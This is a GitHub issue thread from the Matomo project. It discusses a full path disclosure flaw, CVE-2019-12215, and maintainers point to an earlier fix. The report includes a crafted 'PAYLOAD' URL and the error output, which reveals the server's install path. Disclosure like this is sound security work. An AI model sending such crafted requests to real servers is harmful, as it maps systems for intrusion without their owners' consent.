-
-
Notifications
You must be signed in to change notification settings - Fork 2.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Full Path Disclosure #14464
Comments
Hi, On my Matomo instance this only shows the generic |
I can confirm this problem, but it only works if the user has at least view access to the site. No custom PHP settings are in place. |
No custom settings here and yeah it requires authentication I did state that :) |
This is the code that displays this additional error information: matomo/plugins/CorePluginsAdmin/templates/safemode.twig Lines 35 to 63 in 17ca84d
So @Findus23 I would guess, you tried as anonymous user? The easy fix would be probably to remove the basepath from |
Not sure what I did wrong before, but now I can get the same safemode page. But I doubt that showing the full backtrace to superusers isn't that much of a security issue and helps greatly with debugging. I'm not sure what is causing the exception itself as I can also reproduce it with |
The problem is, that this page gets displayed for all users because the |
Hi, @fdellwing has a great point, @Findus23 can you confirm this is a vulnerability please? |
The issue why that message appears at all was fixed in #14023 If you have any other urls that are throwing any kind of unexpected error, feel free to create issues for those errors (not any containing path disclosures). |
A full path disclosure vulnerability was discovered in Matomo (v3.9.1) where a user can trigger a particular error to discover the full path of Matomo on the disk.
PAYLOAD
http://example.com/index.php?date=2019-04-20%2C2019-05-19&forceView=1&viewDataTable=test&module=API&action=get&widget=1&disableLink=0&idSite=1&period=day&columns=nb_outlinks%2Cnb_uniq_outlinks&colors={%22backgroundColor%22%3A%22%23ffffff%22%2C%22lineColor%22%3A%22%23162c4a%22%2C%22minPointColor%22%3A%22%23ff7f7f%22%2C%22maxPointColor%22%3A%22%2375bf7c%22%2C%22lastPointColor%22%3A%22%2355aaff%22%2C%22fillColor%22%3A%22%23ffffff%22
RESULT:
Neither the property "getRows" nor one of the methods "getRows()", "getgetRows()"/"isgetRows()" or "__call()" exist and have public access in class "Piwik\DataTable\Map".
in /var/www/html/mato/piwik/plugins/CoreVisualizations/templates/_dataTableViz_htmlTable.twig line 21
Discovered by Gionathan Armando Reale
CVE-2019-12215
The text was updated successfully, but these errors were encountered: